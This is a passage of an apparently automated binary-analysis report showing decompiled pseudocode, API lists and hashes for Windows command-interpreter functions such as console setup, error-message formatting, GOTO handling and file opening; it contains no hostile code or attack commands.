                                              • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 002C9818
                                              • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 002C9826
                                                • Part of subcall function 002B0178: _get_osfhandle.MSVCRT ref: 002B0183
                                                • Part of subcall function 002B0178: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,002BD6A1), ref: 002B018D
                                                • Part of subcall function 002ADB92: _close.MSVCRT ref: 002ADBC1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_close_get_osfhandle_wcsuprtowupperwcschr
                                              • String ID: <noalias>$CMD.EXE
                                              • API String ID: 2015057810-1690691951
                                              • Opcode ID: d1617faadb2d142b0b2ac2441d14a963f464588f5b6c443a4c652926f8c6d0a4
                                              • Instruction ID: fc5779ae7923b15b8686b5d8811b621bf56b85989670284fc99b994f7143e51d
                                              • Opcode Fuzzy Hash: d1617faadb2d142b0b2ac2441d14a963f464588f5b6c443a4c652926f8c6d0a4
                                              • Instruction Fuzzy Hash: 758105719202559BCF109FA4EC8DFEEB7B9AF45710F18021DF806A7290EB709DA5CB60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002C1C79, Relevance: 26.4, APIs: 2, Strings: 13, Instructions: 166windowthreadCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 23%
                                              			E002C1C79(signed short* __ecx, signed int __edx, intOrPtr* _a4) {
				signed int _v8;
				short _v520;
				char* _v524;
				signed int _v528;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t39;
				intOrPtr _t45;
				signed short* _t50;
				void* _t53;
				void* _t54;
				signed short* _t58;
				void* _t59;
				void* _t60;
				signed short* _t65;
				void* _t74;
				intOrPtr* _t75;
				void* _t76;
				intOrPtr* _t77;
				signed int _t78;
				void* _t79;
				void* _t80;
				void* _t81;
				void* _t82;

				_t73 = __edx;
				_t39 =  *0x2cd0b4; // 0x40f69e4c
				_v8 = _t39 ^ _t78;
				_t65 = __ecx;
				_v528 = __edx;
				_t77 = _a4;
				if(__edx == 0 || __ecx == 0) {
					L31:
					return E002B6FD0(0, _t65, _v8 ^ _t78, _t73, _t74, _t77);
				} else {
					_push(_t74);
					_t75 =  *0x2e807c;
					 *__ecx = 0;
					if(_t75 == 0 ||  *0x2e8081 == 0) {
						L5:
						_v524 = 0x2a30d8;
						_t45 =  *_t77;
						if(_t45 == 0) {
							_v524 = "Exception";
						} else {
							_t59 = _t45 - 1;
							if(_t59 == 0) {
								_v524 = "ReturnHr";
							} else {
								_t60 = _t59 - 1;
								if(_t60 == 0) {
									_v524 = "LogHr";
								} else {
									if(_t60 == 1) {
										_v524 = "FailFast";
									}
								}
							}
						}
						_v520 = 0;
						FormatMessageW(0x1200, 0,  *(_t77 + 4), 0x400,  &_v520, 0x100, 0);
						_push( *((intOrPtr*)(_t77 + 0x48)));
						_push( *((intOrPtr*)(_t77 + 0x44)));
						_t76 = _t65 + _v528 * 2;
						if( *((intOrPtr*)(_t77 + 0x1c)) == 0) {
							_push(L"%hs!%p: ");
							_push(_t76);
							_push(_t65);
							_t50 = E002C24CB();
							_t80 = _t79 + 0x14;
						} else {
							_push( *((intOrPtr*)(_t77 + 0x20)));
							_t50 = E002C24CB(_t65, _t76, L"%hs(%d)\\%hs!%p: ",  *((intOrPtr*)(_t77 + 0x1c)));
							_t80 = _t79 + 0x1c;
						}
						_t65 = _t50;
						if( *((intOrPtr*)(_t77 + 0x4c)) != 0) {
							_t58 = E002C24CB(_t65, _t76, L"(caller: %p) ",  *((intOrPtr*)(_t77 + 0x4c)));
							_t80 = _t80 + 0x10;
							_t65 = _t58;
						}
						_push( &_v520);
						_push( *(_t77 + 4));
						_push(GetCurrentThreadId());
						_push( *((intOrPtr*)(_t77 + 0x24)));
						_t53 = E002C24CB(_t65, _t76, L"%hs(%d) tid(%x) %08X %ws", _v524);
						_t81 = _t80 + 0x20;
						if( *((intOrPtr*)(_t77 + 0xc)) != 0 ||  *((intOrPtr*)(_t77 + 0x28)) != 0 ||  *((intOrPtr*)(_t77 + 0x18)) != 0) {
							_push(L"    ");
							_push(_t76);
							_push(_t53);
							_t54 = E002C24CB();
							_t82 = _t81 + 0xc;
							if( *((intOrPtr*)(_t77 + 0xc)) != 0) {
								_t54 = E002C24CB(_t54, _t76, L"Msg:[%ws] ",  *((intOrPtr*)(_t77 + 0xc)));
								_t82 = _t82 + 0x10;
							}
							if( *((intOrPtr*)(_t77 + 0x28)) != 0) {
								_t54 = E002C24CB(_t54, _t76, L"CallContext:[%hs] ",  *((intOrPtr*)(_t77 + 0x28)));
								_t82 = _t82 + 0x10;
							}
							if( *((intOrPtr*)(_t77 + 0x14)) == 0) {
								if( *((intOrPtr*)(_t77 + 0x18)) == 0) {
									_push("\n");
									_push(_t76);
									_push(_t54);
									E002C24CB();
								} else {
									E002C24CB(_t54, _t76, L"[%hs]\n",  *((intOrPtr*)(_t77 + 0x18)));
								}
							} else {
								_push( *((intOrPtr*)(_t77 + 0x14)));
								E002C24CB(_t54, _t76, L"[%hs(%hs)]\n",  *((intOrPtr*)(_t77 + 0x18)));
							}
						}
						goto L30;
					} else {
						 *0x2e94b4(_t77, __ecx, __edx);
						 *_t75();
						if(( *__ecx & 0x0000ffff) != 0) {
							L30:
							_pop(_t74);
							goto L31;
						}
						goto L5;
					}
				}
			}




























                                              0x002c1c79
                                              0x002c1c84
                                              0x002c1c8b
                                              0x002c1c91
                                              0x002c1c93
                                              0x002c1c9a
                                              0x002c1c9f
                                              0x002c1e72
                                              0x002c1e83
                                              0x002c1cad
                                              0x002c1cad
                                              0x002c1cae
                                              0x002c1cb6
                                              0x002c1cbb
                                              0x002c1cde
                                              0x002c1ce2
                                              0x002c1cec
                                              0x002c1cee
                                              0x002c1d23
                                              0x002c1cf0
                                              0x002c1cf0
                                              0x002c1cf3
                                              0x002c1d17
                                              0x002c1cf5
                                              0x002c1cf5
                                              0x002c1cf8
                                              0x002c1d0b
                                              0x002c1cfa
                                              0x002c1cfd
                                              0x002c1cff
                                              0x002c1cff
                                              0x002c1cfd
                                              0x002c1cf8
                                              0x002c1cf3
                                              0x002c1d35
                                              0x002c1d51
                                              0x002c1d61
                                              0x002c1d64
                                              0x002c1d67
                                              0x002c1d6a
                                              0x002c1d83
                                              0x002c1d88
                                              0x002c1d89
                                              0x002c1d8a
                                              0x002c1d8f
                                              0x002c1d6c
                                              0x002c1d6c
                                              0x002c1d79
                                              0x002c1d7e
                                              0x002c1d7e
                                              0x002c1d96
                                              0x002c1d98
                                              0x002c1da4
                                              0x002c1da9
                                              0x002c1dac
                                              0x002c1dac
                                              0x002c1db4
                                              0x002c1db5
                                              0x002c1dbe
                                              0x002c1dbf
                                              0x002c1dcf
                                              0x002c1dd6
                                              0x002c1ddc
                                              0x002c1dec
                                              0x002c1df1
                                              0x002c1df2
                                              0x002c1df3
                                              0x002c1df8
                                              0x002c1dff
                                              0x002c1e0b
                                              0x002c1e10
                                              0x002c1e10
                                              0x002c1e17
                                              0x002c1e23
                                              0x002c1e28
                                              0x002c1e28
                                              0x002c1e2f
                                              0x002c1e4c
                                              0x002c1e62
                                              0x002c1e67
                                              0x002c1e68
                                              0x002c1e69
                                              0x002c1e4e
                                              0x002c1e58
                                              0x002c1e5d
                                              0x002c1e31
                                              0x002c1e31
                                              0x002c1e3e
                                              0x002c1e43
                                              0x002c1e2f
                                              0x00000000
                                              0x002c1cc5
                                              0x002c1cca
                                              0x002c1cd0
                                              0x002c1cd8
                                              0x002c1e71
                                              0x002c1e71
                                              0x00000000
                                              0x002c1e71
                                              0x00000000
                                              0x002c1cd8
                                              0x002c1cbb

                                              APIs
                                              • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001200,00000000,?,00000400,?,00000100,00000000,?,?,00000000), ref: 002C1D51
                                              • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?), ref: 002C1DB8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: CurrentFormatMessageThread
                                              • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%d)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
                                              • API String ID: 2411632146-2849347638
                                              • Opcode ID: 64ec5174d9f4135b35411daf6b011b2dfc3dd36e2c32954529d3a8edc589e8d6
                                              • Instruction ID: 8b42832d15e13c923642e0a12904cb958f7443bfba1513b2a6d0237bcdc4bca0
                                              • Opcode Fuzzy Hash: 64ec5174d9f4135b35411daf6b011b2dfc3dd36e2c32954529d3a8edc589e8d6
                                              • Instruction Fuzzy Hash: F3513371620301ABDB349F699C4AFA7B6B8EF47300F00465DF50A92162DA719EB4CB61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002AE560, Relevance: 24.8, APIs: 11, Strings: 3, Instructions: 306COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 72%
                                              			E002AE560(struct HINSTANCE__** __ecx, struct HINSTANCE__* __edx) {
				signed int _v8;
				char _v24;
				int _v28;
				void* _v32;
				intOrPtr _v36;
				void* _v40;
				void* _v48;
				struct HINSTANCE__* _v552;
				struct HINSTANCE__* _v556;
				struct HINSTANCE__* _v560;
				struct HINSTANCE__* _v564;
				struct HINSTANCE__* _v568;
				intOrPtr _v572;
				void* _v576;
				void* _v580;
				void* _v584;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t60;
				struct HINSTANCE__* _t63;
				struct HINSTANCE__* _t67;
				struct HINSTANCE__* _t71;
				struct HINSTANCE__* _t72;
				struct HINSTANCE__ _t74;
				int _t77;
				int _t82;
				struct HINSTANCE__* _t84;
				struct HINSTANCE__* _t91;
				struct HINSTANCE__* _t92;
				void* _t93;
				struct HINSTANCE__* _t94;
				struct HINSTANCE__* _t95;
				struct HINSTANCE__* _t96;
				struct HINSTANCE__* _t108;
				struct HINSTANCE__** _t111;
				void* _t112;
				struct HINSTANCE__* _t118;
				struct HINSTANCE__ _t124;
				struct HINSTANCE__* _t143;
				void* _t144;
				struct HINSTANCE__* _t145;
				struct HINSTANCE__* _t147;
				void* _t148;
				struct HINSTANCE__* _t149;
				signed int _t150;
				signed int _t152;
				void* _t153;

				_t136 = __edx;
				_t152 = (_t150 & 0xfffffff8) - 0x234;
				_t60 =  *0x2cd0b4; // 0x40f69e4c
				_v8 = _t60 ^ _t152;
				_t111 = __ecx;
				_v556 = __edx;
				_t147 = 0;
				_t143 = 1;
				_v564 = 0;
				_v560 = 1;
				_v552 = 0;
				if( *0x2e3cc4 != __ecx) {
					L79:
					_t63 = _t147;
					goto L33;
				} else {
					L2:
					while(1) {
						if( *0x2cd544 != 0) {
							E002C921A(_t111, _t143);
							_t136 = _v556;
						}
						 *0x2cd590 = 0;
						if( *0x2e3cc9 == 0 || _t143 == 0) {
							L5:
							_t145 = E002B0662(_t111);
							if(_t145 == 0xffffffff) {
								goto L74;
							}
							_t67 = E002AEEF0(3, _t145, _t111[4]);
							_t147 = _t67;
							__imp___tell(_t145);
							_t111[2] = _t67;
							_t153 = _t152 + 4;
							_t8 = _t145 - 3; // -3
							_t118 = 0;
							_t136 = _t145;
							if(_t8 > 0x5b) {
								L9:
								__imp___close(_t145);
								_t152 = _t153 + 4;
								if(_t147 == 0) {
									goto L42;
								}
								if(_t147 == 1 ||  *0x2df980 == 0x234a) {
									E002C82EB(_t118);
									__eflags =  *0x2cd0c8 - 1;
									if( *0x2cd0c8 == 1) {
										__eflags =  *0x2e8530;
										if( *0x2e8530 == 0) {
											E002C6FF0(_t118);
											E002AC108(_t118, 0x2371, 1, 0x2d3892);
											_t152 = _t152 + 0xc;
										}
									}
									E002C9287(_t118);
									__imp__longjmp(0x2db8b8, 1);
									goto L79;
								} else {
									if(_t147 == 0xffffffff) {
										_t63 = _v564;
										goto L33;
									} else {
										_t143 = _v560;
										_t136 = _v552;
										goto L14;
									}
								}
							}
							if(_t145 > 0x1f) {
								_t49 = _t145 - 0x20; // -32
								_t108 = 1 + (_t49 >> 5);
								__eflags = _t108;
								_t118 = _t108;
								do {
									_t136 = _t136 - 0x20;
									_t108 = _t108 - 1;
									__eflags = _t108;
								} while (_t108 != 0);
							}
							asm("btr eax, edx");
							goto L9;
						} else {
							__eflags =  *((short*)( *((intOrPtr*)(_t136 + 0x38)))) - 0x3a;
							if( *((short*)( *((intOrPtr*)(_t136 + 0x38)))) != 0x3a) {
								goto L5;
							}
							_t147 = E002B00B0(0x50);
							__eflags = _t147;
							if(_t147 == 0) {
								L74:
								_t63 = 1;
								L33:
								_pop(_t144);
								_pop(_t148);
								_pop(_t112);
								__eflags = _v8 ^ _t152;
								return E002B6FD0(_t63, _t112, _v8 ^ _t152, _t136, _t144, _t148);
							}
							_t147->i = 0;
							_t71 = E002ADF40(L"GOTO");
							 *(_t147 + 0x38) = _t71;
							__eflags = _t71;
							if(_t71 == 0) {
								goto L74;
							}
							_t72 = E002ADF40( *((intOrPtr*)(_v556 + 0x38)));
							 *(_t147 + 0x3c) = _t72;
							__eflags = _t72;
							if(_t72 == 0) {
								goto L74;
							}
							_t136 = 1;
							_t72->i = 0x20;
							 *(_t147 + 0x40) = 0;
							_v552 = 1;
							L14:
							if(_t143 != 0) {
								__eflags = _t147;
								if(_t147 != 0) {
									_v560 = 0;
								}
							}
							_t124 = _t147->i;
							if(_t124 != 0 ||  *( *(_t147 + 0x38)) != 0x3a) {
								if(_t136 != 0) {
									_v552 = 0;
									_t74 = _t124;
								} else {
									_t74 = _t124;
									if( *0x2cd0c8 == 1) {
										_t74 = _t124;
										__eflags = _t124 - 0x3b;
										if(_t124 != 0x3b) {
											__eflags =  *0x2e8530;
											_t74 = _t124;
											if( *0x2e8530 == 0) {
												E002C6FF0(_t124);
												_t136 = 0;
												E002C2ED0(_t147, 0);
												E002B25D9(L"\r\n");
												_t74 = _t147->i;
												_t152 = _t152 + 4;
											}
										}
									}
								}
								if(_t74 == 0x3b) {
									_t147 =  *(_t147 + 0x38);
								}
								_v28 = 0;
								_v24 = 1;
								 *(_t152 + 0x23c) = 0x104;
								memset(_t152 + 0x24, 0, 0x104);
								_t152 = _t152 + 0xc;
								if(_v24 == 0) {
									_t77 = 0x104;
								} else {
									_t77 = 0x7fe7;
								}
								if(E002B0C70(_t152 + 0x24, _t77) < 0) {
									E002B0DE8(_t78, _t152 + 0x20);
									goto L74;
								} else {
									if(_t147 == 0) {
										_t147 = 0;
										_v564 = 0;
										L29:
										__imp__??_V@YAXPAX@Z(_v28);
										_t152 = _t152 + 4;
										goto L30;
									}
									if( *_t147 != 0 || E002ADFC0(0x2a,  *(_t147 + 0x38),  &_v564) != 0xffffffff) {
										L26:
										_t136 = _t147;
										_v564 = E002B0E00(2, _t147);
										E002B06C0(2);
										_t82 = GetConsoleOutputCP();
										 *0x2d3854 = _t82;
										GetCPInfo(_t82, 0x2d3840);
										_t149 =  *0x2cd5f8; // 0x0
										if(_t149 == 0) {
											_t84 =  *0x2cd0d0; // 0xffffffff
											__eflags = _t84 - 0xffffffff;
											if(_t84 != 0xffffffff) {
												L68:
												__eflags = _t84;
												if(_t84 != 0) {
													_t149 = GetProcAddress(_t84, "SetThreadUILanguage");
													 *0x2cd5f8 = _t149;
												}
												L70:
												__eflags = _t149;
												if(_t149 != 0) {
													goto L27;
												}
												SetThreadLocale(0x409);
												L28:
												_t147 = _v568;
												goto L29;
											}
											_t84 = GetModuleHandleW(L"KERNEL32.DLL");
											_t149 =  *0x2cd5f8; // 0x0
											 *0x2cd0d0 = _t84;
											__eflags = _t84 - 0xffffffff;
											if(_t84 == 0xffffffff) {
												goto L70;
											}
											goto L68;
										}
										L27:
										 *0x2e94b4(0);
										_t149->i();
										goto L28;
									} else {
										_t91 = E002AD7D4( *(_t147 + 0x38), 0x2a);
										__eflags = _t91;
										if(_t91 != 0) {
											goto L26;
										}
										_t44 = _t91 + 0x3f; // 0x3f
										_t92 = E002AD7D4( *(_t147 + 0x38), _t44);
										__eflags = _t92;
										if(_t92 != 0) {
											goto L26;
										}
										_t141 = _v28;
										__eflags = _v28;
										if(__eflags == 0) {
											_t141 = _t152 + 0x20;
										}
										_t93 = E002B10B0(_t147, _t141, __eflags,  *((intOrPtr*)(_t152 + 0x230)));
										__eflags = _t93 - 2;
										if(_t93 != 2) {
											goto L26;
										} else {
											__eflags =  *(_t147 + 0x34);
											if( *(_t147 + 0x34) == 0) {
												L62:
												_t94 = _v28;
												__eflags = _t94;
												if(__eflags == 0) {
													_t94 = _t152 + 0x20;
												}
												_t136 =  *_t111;
												_push(_t94);
												_push(_t111[1]);
												_t95 = E002B1F52(_t111, _t147,  *_t111, _t143, _t147, __eflags);
												__eflags = _t95;
												if(_t95 != 0) {
													goto L72;
												} else {
													_t147 = 0;
													_v568 = 1;
													_v572 = 0;
													goto L29;
												}
											} else {
												_t136 = _t147;
												_t96 = E002C76C0(_v556, _t147);
												__eflags = _t96;
												if(_t96 != 0) {
													L72:
													__imp__??_V@YAXPAX@Z(_v36);
													_t152 = _t152 + 4;
													_t63 = 1;
													goto L33;
												}
												goto L62;
											}
										}
									}
								}
							} else {
								L42:
								_t147 = _v564;
								L30:
								if( *0x2e3cc4 != _t111) {
									goto L79;
								}
								_t143 = _v560;
								_t136 = _v556;
								continue;
							}
						}
					}
				}
			}




















































                                              0x002ae560
                                              0x002ae568
                                              0x002ae56e
                                              0x002ae575
                                              0x002ae57f
                                              0x002ae581
                                              0x002ae585
                                              0x002ae589
                                              0x002ae58e
                                              0x002ae592
                                              0x002ae596
                                              0x002ae5a0
                                              0x002bc011
                                              0x002bc011
                                              0x00000000
                                              0x002ae5a6
                                              0x00000000
                                              0x002ae5b0
                                              0x002ae5b7
                                              0x002bbe97
                                              0x002bbe9c
                                              0x002bbe9c
                                              0x002ae5c4
                                              0x002ae5cb
                                              0x002ae5d5
                                              0x002ae5dc
                                              0x002ae5e1
                                              0x00000000
                                              0x00000000
                                              0x002ae5f1
                                              0x002ae5f7
                                              0x002ae5f9
                                              0x002ae5ff
                                              0x002ae602
                                              0x002ae605
                                              0x002ae608
                                              0x002ae60a
                                              0x002ae60f
                                              0x002ae62b
                                              0x002ae62c
                                              0x002ae632
                                              0x002ae637
                                              0x00000000
                                              0x00000000
                                              0x002ae640
                                              0x002bbfcf
                                              0x002bbfd4
                                              0x002bbfdb
                                              0x002bbfdd
                                              0x002bbfe4
                                              0x002bbfe6
                                              0x002bbff7
                                              0x002bbffc
                                              0x002bbffc
                                              0x002bbfe4
                                              0x002bbfff
                                              0x002bc00b
                                              0x00000000
                                              0x002ae656
                                              0x002ae659
                                              0x002ae794
                                              0x00000000
                                              0x002ae65f
                                              0x002ae65f
                                              0x002ae663
                                              0x00000000
                                              0x002ae663
                                              0x002ae659
                                              0x002ae640
                                              0x002ae614
                                              0x002bbea5
                                              0x002bbeab
                                              0x002bbeab
                                              0x002bbeac
                                              0x002bbeae
                                              0x002bbeae
                                              0x002bbeb1
                                              0x002bbeb1
                                              0x002bbeb1
                                              0x002bbeb6
                                              0x002ae621
                                              0x00000000
                                              0x002ae7ad
                                              0x002ae7b0
                                              0x002ae7b4
                                              0x00000000
                                              0x00000000
                                              0x002ae7c4
                                              0x002ae7c6
                                              0x002ae7c8
                                              0x002bbfc5
                                              0x002bbfc5
                                              0x002ae798
                                              0x002ae79f
                                              0x002ae7a0
                                              0x002ae7a1
                                              0x002ae7a2
                                              0x002ae7ac
                                              0x002ae7ac
                                              0x002ae7d3
                                              0x002ae7d9
                                              0x002ae7de
                                              0x002ae7e1
                                              0x002ae7e3
                                              0x00000000
                                              0x00000000
                                              0x002ae7f0
                                              0x002ae7f5
                                              0x002ae7f8
                                              0x002ae7fa
                                              0x00000000
                                              0x00000000
                                              0x002ae805
                                              0x002ae80a
                                              0x002ae80d
                                              0x002ae814
                                              0x002ae667
                                              0x002ae669
                                              0x002ae81d
                                              0x002ae81f
                                              0x002ae827
                                              0x002ae827
                                              0x002ae81f
                                              0x002ae66f
                                              0x002ae673
                                              0x002ae684
                                              0x002ae832
                                              0x002ae836
                                              0x002ae68a
                                              0x002ae691
                                              0x002ae693
                                              0x002ae89d
                                              0x002ae89f
                                              0x002ae8a2
                                              0x002bbebb
                                              0x002bbec2
                                              0x002bbec4
                                              0x002bbeca
                                              0x002bbecf
                                              0x002bbed3
                                              0x002bbedd
                                              0x002bbee2
                                              0x002bbee4
                                              0x002bbee4
                                              0x002bbec4
                                              0x002ae8a2
                                              0x002ae693
                                              0x002ae69c
                                              0x002ae846
                                              0x002ae846
                                              0x002ae6ab
                                              0x002ae6b9
                                              0x002ae6c1
                                              0x002ae6cc
                                              0x002ae6d1
                                              0x002ae6dc
                                              0x002bbeec
                                              0x002ae6e2
                                              0x002ae6e2
                                              0x002ae6e2
                                              0x002ae6f3
                                              0x002bbfc0
                                              0x00000000
                                              0x002ae6f9
                                              0x002ae6fb
                                              0x002bbef6
                                              0x002bbef8
                                              0x002ae76b
                                              0x002ae772
                                              0x002ae778
                                              0x00000000
                                              0x002ae778
                                              0x002ae704
                                              0x002ae721
                                              0x002ae721
                                              0x002ae72d
                                              0x002ae731
                                              0x002ae736
                                              0x002ae742
                                              0x002ae747
                                              0x002ae74d
                                              0x002ae755
                                              0x002bbf4d
                                              0x002bbf52
                                              0x002bbf55
                                              0x002bbf72
                                              0x002bbf72
                                              0x002bbf74
                                              0x002bbf82
                                              0x002bbf84
                                              0x002bbf84
                                              0x002bbf8a
                                              0x002bbf8a
                                              0x002bbf8c
                                              0x00000000
                                              0x00000000
                                              0x002bbf97
                                              0x002ae767
                                              0x002ae767
                                              0x00000000
                                              0x002ae767
                                              0x002bbf5c
                                              0x002bbf62
                                              0x002bbf68
                                              0x002bbf6d
                                              0x002bbf70
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002bbf70
                                              0x002ae75b
                                              0x002ae75f
                                              0x002ae765
                                              0x00000000
                                              0x002ae84e
                                              0x002ae856
                                              0x002ae85b
                                              0x002ae85d
                                              0x00000000
                                              0x00000000
                                              0x002ae866
                                              0x002ae869
                                              0x002ae86e
                                              0x002ae870
                                              0x00000000
                                              0x00000000
                                              0x002ae876
                                              0x002ae87d
                                              0x002ae87f
                                              0x002ae8ad
                                              0x002ae8ad
                                              0x002ae88a
                                              0x002ae88f
                                              0x002ae892
                                              0x00000000
                                              0x002ae898
                                              0x002bbf01
                                              0x002bbf05
                                              0x002bbf1a
                                              0x002bbf1a
                                              0x002bbf21
                                              0x002bbf23
                                              0x002bbf25
                                              0x002bbf25
                                              0x002bbf29
                                              0x002bbf2d
                                              0x002bbf2e
                                              0x002bbf31
                                              0x002bbf36
                                              0x002bbf38
                                              0x00000000
                                              0x002bbf3a
                                              0x002bbf3a
                                              0x002bbf3c
                                              0x002bbf44
                                              0x00000000
                                              0x002bbf44
                                              0x002bbf07
                                              0x002bbf0b
                                              0x002bbf0d
                                              0x002bbf12
                                              0x002bbf14
                                              0x002bbfa2
                                              0x002bbfa9
                                              0x002bbfaf
                                              0x002bbfb2
                                              0x00000000
                                              0x002bbfb2
                                              0x00000000
                                              0x002bbf14
                                              0x002bbf05
                                              0x002ae892
                                              0x002ae704
                                              0x002ae83d
                                              0x002ae83d
                                              0x002ae83d
                                              0x002ae77b
                                              0x002ae781
                                              0x00000000
                                              0x00000000
                                              0x002ae787
                                              0x002ae78b
                                              0x00000000
                                              0x002ae78b
                                              0x002ae673
                                              0x002ae5cb
                                              0x002ae5b0

                                              APIs
                                              • _tell.MSVCRT ref: 002AE5F9
                                              • _close.MSVCRT ref: 002AE62C
                                              • memset.MSVCRT ref: 002AE6CC
                                              • GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00007FE7), ref: 002AE736
                                              • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,002D3840), ref: 002AE747
                                              • ??_V@YAXPAX@Z.MSVCRT ref: 002AE772
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: ConsoleInfoOutput_close_tellmemset
                                              • String ID: GOTO$KERNEL32.DLL$SetThreadUILanguage
                                              • API String ID: 1380661413-3584302480
                                              • Opcode ID: 5894039318701d42d600dffce96e362329e603ef2e507c73d130e1828fcec0d2
                                              • Instruction ID: 9ceedca52ab8f2eae6b3a319717fff76a5f86aff8155e7ea1d7a174e7ef40765
                                              • Opcode Fuzzy Hash: 5894039318701d42d600dffce96e362329e603ef2e507c73d130e1828fcec0d2
                                              • Instruction Fuzzy Hash: AEB1E470624302CBDB25DF24DC8876AB7E5AF85744F110929F846876A0EFB0DC66CF82
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002AD120, Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 177fileCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 21%
                                              			E002AD120(long __ecx, signed int __edx) {
				void _v8;
				long _v12;
				long _v16;
				long _v20;
				signed int _v24;
				long _v28;
				struct _SECURITY_ATTRIBUTES _v40;
				signed int _t34;
				long _t37;
				void* _t41;
				signed int _t44;
				signed int _t49;
				int _t54;
				signed char _t64;
				void* _t67;
				signed int _t71;
				long _t75;
				void* _t76;
				signed int _t78;
				signed int _t79;
				void* _t81;

				_t65 = __ecx;
				_t75 = 3;
				_v20 = __ecx;
				_t64 = __edx;
				_v16 = 3;
				_t71 = __edx & 0x00000003;
				_v40.bInheritHandle = 1;
				_v40.lpSecurityDescriptor = 0;
				_v40.nLength = 0xc;
				if(_t71 > 2) {
					L2:
					return _t34 | 0xffffffff;
				}
				_t34 = __edx & 0x00000009;
				if(_t34 != 9) {
					if(_t71 != 0) {
						_t78 = 0x40000000;
						__imp___wcsicmp(__ecx, L"con");
						_t81 = _t81 + 8;
						if(_t34 != 0) {
							_t75 = 1;
							_v16 = 1;
						}
						_t65 = _v20;
						_t37 = 2;
					} else {
						_t78 = 0x80000000;
						_t37 = 3;
					}
					_push(0);
					_push(0x80);
					if(_t64 == 0x10a) {
						_t41 = CreateFileW(_t65, _t78 | 0x80000000, _t75,  &_v40, 3, ??, ??);
						_t76 = _t41;
						if(_t76 != 0xffffffff) {
							goto L9;
						}
						_push(0);
						_push(0x80);
						_push(4);
						_push( &_v40);
						_push(_v16);
						_push(_t78);
						_push(_v20);
						goto L8;
					} else {
						_push(_t37);
						_push( &_v40);
						_push(_t75);
						_push(_t78);
						_push(_t65);
						L8:
						_t41 = CreateFileW();
						_t76 = _t41;
						if(_t76 == 0xffffffff) {
							_t54 = GetLastError();
							 *0x2e3cf0 = _t54;
							if(_t54 == 0x6e) {
								 *0x2e3cf0 = 2;
							}
							L28:
							_t44 = _t54 | 0xffffffff;
							L14:
							return _t44;
						}
						L9:
						__imp___open_osfhandle(_t76, 8);
						_t79 = _t41;
						if((_t64 & 0x00000008) != 0) {
							if(E002B0178(_t41) != 0) {
								goto L10;
							}
							_t49 = GetFileSize(_t76,  &_v20);
							_v24 = _t49;
							if((_t49 | _v20) == 0) {
								goto L10;
							}
							_v12 = 0xffffffff;
							_v8 = 0;
							if(SetFilePointer(_t76, 0xffffffff,  &_v12, 2) == 0xffffffff) {
								_t54 = GetLastError();
								 *0x2e3cf0 = _t54;
								if(_t54 == 0) {
									goto L23;
								}
								if(_t79 == 0xffffffff) {
									_t54 = CloseHandle(_t76);
								} else {
									__imp___close(_t79);
								}
								goto L28;
							}
							L23:
							if(ReadFile(_t76,  &_v8, 1,  &_v28, 0) == 0) {
								_v12 = 0;
								SetFilePointer(_t76, 0,  &_v12, 2);
							}
							if(_v8 == 0x1a) {
								_v12 = 0xffffffff;
								SetFilePointer(_t76, 0xffffffff,  &_v12, 2);
							}
						}
						L10:
						_t9 = _t79 - 3; // -3
						_t67 = 0;
						if(_t9 <= 0x5b) {
							if(_t79 > 0x1f) {
								_t33 = _t79 - 0x20; // -32
								_t67 = (_t33 >> 5) + 1;
							}
							asm("bts eax, edx");
						}
						_t44 = _t79;
						goto L14;
					}
				}
				goto L2;
			}
























                                              0x002ad120
                                              0x002ad12a
                                              0x002ad12f
                                              0x002ad132
                                              0x002ad134
                                              0x002ad137
                                              0x002ad139
                                              0x002ad140
                                              0x002ad147
                                              0x002ad151
                                              0x002ad15c
                                              0x00000000
                                              0x002ad15c
                                              0x002ad155
                                              0x002ad15a
                                              0x002ad16a
                                              0x002ad1ea
                                              0x002ad1ef
                                              0x002ad1f5
                                              0x002ad1fa
                                              0x002ad1fc
                                              0x002ad201
                                              0x002ad201
                                              0x002ad204
                                              0x002ad207
                                              0x002ad16c
                                              0x002ad16c
                                              0x002ad171
                                              0x002ad171
                                              0x002ad173
                                              0x002ad175
                                              0x002ad180
                                              0x002ad221
